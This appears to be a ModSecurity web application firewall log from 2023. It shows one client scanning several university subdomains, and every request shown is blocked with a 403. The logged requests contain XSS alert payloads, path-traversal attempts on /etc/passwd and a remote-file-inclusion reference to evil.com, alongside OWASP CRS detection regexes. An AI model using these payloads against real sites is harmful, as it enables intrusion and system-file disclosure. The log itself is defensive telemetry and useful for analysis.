[Tue Aug 29 11:55:30.547194 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/wp-planet/rss.class/scripts/magpie_debug.php"] [unique_id "ZO16QsCo-f0AAApXgrUAAAAU"]
[Tue Aug 29 11:55:30.554518 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/wp-planet/rss.class/scripts/magpie_debug.php"] [unique_id "ZO16QsCo-f0AAApHRhIAAAAP"]
[Tue Aug 29 11:55:30.671227 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:layout. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:layout: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/badging/badge_template_v0.php"] [unique_id "ZO16QsCo-f0AAAqSwuIAAAAN"]
[Tue Aug 29 11:55:30.673037 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16QsCo-f0AAAqTvskAAAAa"]
[Tue Aug 29 11:55:30.690204 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO16QsCo-f0AAAqeFX8AAAAx"]
[Tue Aug 29 11:55:30.708837 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16QsCo-f0AAAqY6E4AAAAr"]
[Tue Aug 29 11:55:30.709014 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16QsCo-f0AAAqSwuQAAAAN"]
[Tue Aug 29 11:55:30.711018 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16QsCo-f0AAApHRhYAAAAP"]
[Tue Aug 29 11:55:30.711669 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/wp-planet/rss.class/scripts/magpie_debug.php"] [unique_id "ZO16QsCo-f0AAAqTvssAAAAa"]
[Tue Aug 29 11:55:31.591738 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://evil.com found within TX:1: evil.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/html/common/forward_js.jsp"] [unique_id "ZO16Q8Co-f0AAApXgrkAAAAU"]
[Tue Aug 29 11:55:31.593523 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://evil.com found within TX:1: evil.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/html/common/forward_js.jsp"] [unique_id "ZO16Q8Co-f0AAAqY6FAAAAAr"]
[Tue Aug 29 11:55:31.598271 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://evil.com found within TX:1: evil.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/html/common/forward_js.jsp"] [unique_id "ZO16Q8Co-f0AAApHRhcAAAAP"]
[Tue Aug 29 11:55:31.615489 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://evil.com found within TX:1: evil.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/html/common/forward_js.jsp"] [unique_id "ZO16Q8Co-f0AAAqqtg4AAAAA"]
[Tue Aug 29 11:55:31.635896 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://evil.com found within TX:1: evil.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/html/common/forward_js.jsp"] [unique_id "ZO16Q8Co-f0AAApXgroAAAAU"]
[Tue Aug 29 11:55:31.829163 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16Q8Co-f0AAAqTvtAAAAAa"]
[Tue Aug 29 11:55:31.884279 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/wp-planet/rss.class/scripts/magpie_debug.php"] [unique_id "ZO16Q8Co-f0AAAqTvtEAAAAa"]
[Tue Aug 29 11:55:32.614747 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:login-error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:login-error: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO16RMCo-f0AAApXgsEAAAAU"]
[Tue Aug 29 11:55:32.616789 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:login-error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:login-error: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO16RMCo-f0AAAqTvtUAAAAa"]
[Tue Aug 29 11:55:32.661757 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:login-error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:login-error: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO16RMCo-f0AAAolKrEAAAAe"]
[Tue Aug 29 11:55:32.669390 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:login-error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:login-error: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO16RMCo-f0AAApbUjMAAAAh"]
[Tue Aug 29 11:55:32.704906 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:login-error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:login-error: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO16RMCo-f0AAAolKrMAAAAe"]
[Tue Aug 29 11:55:33.729714 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:login-error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:login-error: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO16RcCo-f0AAAolKrwAAAAe"]
[Tue Aug 29 11:55:33.737221 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://evil.com found within TX:1: evil.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/html/common/forward_js.jsp"] [unique_id "ZO16RcCo-f0AAAoz8HUAAAAS"]
[Tue Aug 29 11:55:33.904402 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:query: <script>alert(document.domain);</script>=or"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/pmb/admin/convert/export_z3950.php"] [unique_id "ZO16RcCo-f0AAAqY6GIAAAAr"]
[Tue Aug 29 11:55:34.008559 2023] [:error] [pid 2742] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:query: <script>alert(document.domain);</script>=or"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/pmb/admin/convert/export_z3950.php"] [unique_id "ZO16RsCo-f0AAAq2KcgAAAAE"]
[Tue Aug 29 11:55:34.056412 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:query: <script>alert(document.domain);</script>=or"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/pmb/admin/convert/export_z3950.php"] [unique_id "ZO16RsCo-f0AAAqY6GMAAAAr"]
[Tue Aug 29 11:55:34.110315 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:query: <script>alert(document.domain);</script>=or"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/pmb/admin/convert/export_z3950.php"] [unique_id "ZO16RsCo-f0AAAolKsAAAAAe"]
[Tue Aug 29 11:55:34.146295 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:query: <script>alert(document.domain);</script>=or"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/pmb/admin/convert/export_z3950.php"] [unique_id "ZO16RsCo-f0AAApbUj4AAAAh"]
[Tue Aug 29 11:55:34.632955 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:query: <script>alert(document.domain);</script>=or"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/pmb/admin/convert/export_z3950.php"] [unique_id "ZO16RsCo-f0AAAolKsQAAAAe"]
[Tue Aug 29 11:55:34.829939 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:include_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:include_file: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO16RsCo-f0AAAoz8H0AAAAS"]
